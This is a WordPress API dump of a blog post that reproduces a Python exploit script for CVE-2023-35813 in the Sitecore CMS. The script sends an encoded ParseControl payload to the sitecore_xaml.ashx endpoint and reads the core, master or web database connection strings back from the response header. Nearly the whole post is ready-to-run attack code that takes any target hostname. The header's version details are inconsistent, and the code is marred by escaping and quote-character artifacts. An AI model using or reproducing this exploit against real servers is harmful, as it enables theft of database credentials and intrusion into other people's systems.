#!\/usr\/bin\/env python3
\n#
\n# Exploit Title: Sitecore – Remote Code Execution v8.2
\n# Exploit Author: abhishek morla
\n# Google Dork: N\/A
\n# Date: 2024-01-08
\n# Vendor Homepage: https:\/\/www.sitecore.com\/
\n# Software Link: https:\/\/dev.sitecore.net\/
\n# Version: 10.3
\n# Tested on: windows64bit \/ mozila firefox
\n# CVE : CVE-2023-35813
\n# The vulnerability impacts all Experience Platform topologies (XM, XP, XC) from 9.0 Initial Release to 10.3 Initial Release; 8.2 is also impacted
\n# Blog : https:\/\/medium.com\/@abhishekmorla\/uncovering-cve-2023-35813-retrieving-core-connection-strings-in-sitecore-5502148fce09
\n# Video POC : https:\/\/youtu.be\/vWKl9wgdTB0<\/p>\n
import argparse
\nimport requests
\nfrom urllib.parse import quote
\nfrom rich.console import Console<\/p>\n
console = Console()
\ndef initial_test(hostname):
\n# Initial payload to test vulnerability
\ntest_payload = ”’
\n<%@Register
\nTagPrefix = ‘x’
\nNamespace = ‘System.Runtime.Remoting.Services’
\nAssembly = ‘System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089′
\n%>
\n<x:RemotingService runat=’server’
\nContext-Response-ContentType=’TestVulnerability’
\n\/>
\n”’
\nencoded_payload = quote(test_payload)<\/p>\n
url = f”https:\/\/{hostname}\/sitecore_xaml.ashx\/-\/xaml\/Sitecore.Xaml.Tutorials.Styles.Index”
\nheaders = {“Content-Type”: “application\/x-www-form-urlencoded”}
\ndata = “__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\\”{}\\”)”.format(encoded_payload)<\/p>\n
response = requests.post(url, headers=headers, data=data, verify=False)<\/p>\n
# Check for the test string in the Content-Type of the response
\nreturn ‘TestVulnerability’ in response.headers.get(‘Content-Type’, ”)<\/p>\n
def get_payload(choice):
\n# Payload templates for different options
\npayloads = {
\n‘1’: “<%$ ConnectionStrings:core %>”,
\n‘2’: “<%$ ConnectionStrings:master %>”,
\n‘3’: “<%$ ConnectionStrings:web %>”
\n}<\/p>\n
base_payload = ”’
\n<%@Register
\nTagPrefix = ‘x’
\nNamespace = ‘System.Runtime.Remoting.Services’
\nAssembly = ‘System.Runtime.Remoting, Version=4.0.0.0, Culture=neutral, PublicKeyToken=b77a5c561934e089′
\n%>
\n<x:RemotingService runat=’server’
\nContext-Response-ContentType='{}’
\n\/>
\n”’<\/p>\n
return base_payload.format(payloads.get(choice, “Invalid”))<\/p>\n
def main(hostname):
\nif initial_test(hostname):
\nprint(“Exploiting, Please wait…”)
\nconsole.print(“[bold green]The target appears to be vulnerable. Proceed with payload selection.[\/bold green]”)
\nprint(“Select the payload to use:”)
\nprint(“1: Core connection strings”)
\nprint(“2: Master connection strings”)
\nprint(“3: Web connection strings”)
\npayload_choice = input(“Enter your choice (1, 2, or 3): “)<\/p>\n
payload = get_payload(payload_choice)
\nencoded_payload = quote(payload)<\/p>\n
url = f”http:\/\/{hostname}\/sitecore_xaml.ashx\/-\/xaml\/Sitecore.Xaml.Tutorials.Styles.Index”
\nheaders = {“Content-Type”: “application\/x-www-form-urlencoded”}
\ndata = “__ISEVENT=1&__SOURCE=&__PARAMETERS=ParseControl(\\”{}\\”)”.format(encoded_payload)<\/p>\n
response = requests.post(url, headers=headers, data=data)<\/p>\n
if ‘Content-Type’ in response.headers:
\nprint(“Content-Type from the response header:”)
\nprint(“\\n”)
\nprint(response.headers[‘Content-Type’])
\nelse:
\nprint(“No Content-Type in the response header. Status Code:”, response.status_code)
\nelse:
\nprint(“The target does not appear to be vulnerable to CVE-2023-35813.”)<\/p>\n
if __name__ == “__main__”:
\nconsole.print(“[bold green]Author: Abhishek Morla[\/bold green]”)
\nconsole.print(“[bold red]CVE-2023-35813[\/bold red]”)
\nparser = argparse.ArgumentParser(description=’Test for CVE-2023-35813 vulnerability in Sitecore’)
\nparser.add_argument(‘hostname’, type=str, help=’Hostname of the target Sitecore instance’)
\nargs = parser.parse_args()<\/p>\n
main(args.hostname)<\/p>\n","protected":false},"excerpt":{"rendered":"
#!\/usr\/bin\/env python3 # # Exploit Title: Sitecore – Remote Code Execution v8.2 # Exploit Author: abhishek morla # Google Dork: N\/A # Date: 2024-01-08 # Vendor Homepage: https:\/\/www.sitecore.com\/ # Software Link: https:\/\/dev.sitecore.net\/ # Version: 10.3 # Tested on: windows64bit \/ mozila firefox # CVE : CVE-2023-35813 # The vulnerability impacts all Experience Platform topologies (XM, …<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[26],"tags":[],"class_list":["post-55286","post","type-post","status-publish","format-standard","hentry","category-vulnerability"],"_links":{"self":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55286","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/comments?post=55286"}],"version-history":[{"count":1,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55286\/revisions"}],"predecessor-version":[{"id":55305,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/posts\/55286\/revisions\/55305"}],"wp:attachment":[{"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/media?parent=55286"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/categories?post=55286"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/afaghhosting.net\/blog\/wp-json\/wp\/v2\/tags?post=55286"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}